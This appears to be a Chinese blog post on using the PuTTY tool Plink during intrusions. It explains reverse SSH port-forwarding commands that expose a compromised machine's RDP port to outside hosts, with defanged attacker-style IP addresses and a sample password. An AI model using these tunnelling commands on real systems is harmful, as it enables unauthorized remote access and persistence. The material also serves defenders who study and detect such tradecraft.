利用Plink网络管理工具进行渗透

Plink是PuTTY SSH客户端的命令行连接工具。

一、使用Plink来配置端口转发规则允许从远程主机进行 RDP 访问。
命令行如下:

plink.exe 151.236.19[.]91 -P [REMOVED]-C -N -R 0.0.0.0:54231:127.0.0.1:3389 -l [REMOVED] -pw [REMOVED]

将所有可用接口上的端口 3389 转发到端口 999:

plink.exe [REMOVED] -pw [REMOVED] -P [REMOVED] -2 -4 -T -N -C -R 0.0.0.0:999:127.0.0.1:3389

命令中提供的选项执行以下操作:
-2 -4:为连接启用 SSH 版本 2 和 IPv4 协议。
-T:为远程会话请求伪终端。
-N:防止运行远程命令,通常用于设置端口
-R 0.0.0.0:999:127.0.0.1:3389:指定远程端口转发。它指示远程服务器侦听所有网络接口 (0.0.0.0) 的端口 999,并将任何传入连接转发到本地计算机(运行命令的计算机)上的端口 3389 (127.0.0.1:3389)。这有效地建立了一条隧道,允许攻击者通过 SSH 连接访问远程服务,例如 RDP。

二、使用 Plink 创建 SSH 隧道来访问 RDP 服务
命令行如下:
plink.exe ssh 78.47.218[.]106 1234qweRRR 443 10999 10.75.45.222 3389
上述命令执行以下操作:
ssh:表示正在使用 SSH 协议进行连接。
78.47.218[.]106:使用SSH连接的远程服务器的IP地址。
1234qweRRR:可能需要对远程服务器进行身份验证所需的密码。
443:远程服务器上 SSH 连接的端口号。
10999:Plink 用于创建隧道的本地端口号。
10.75.45.222:本地计算机或网络的 IP 地址。
3389:远程桌面协议 (RDP) 端口号。这表明流量正在从远程服务器的端口 3389 转发到本地计算机以进行远程桌面访问。
该命令用于从受感染的计算机设置端口转发隧道,作为访问远程服务器的 RDP 服务的方法,就像它在本地运行一样。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

摔不死的笨鸟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值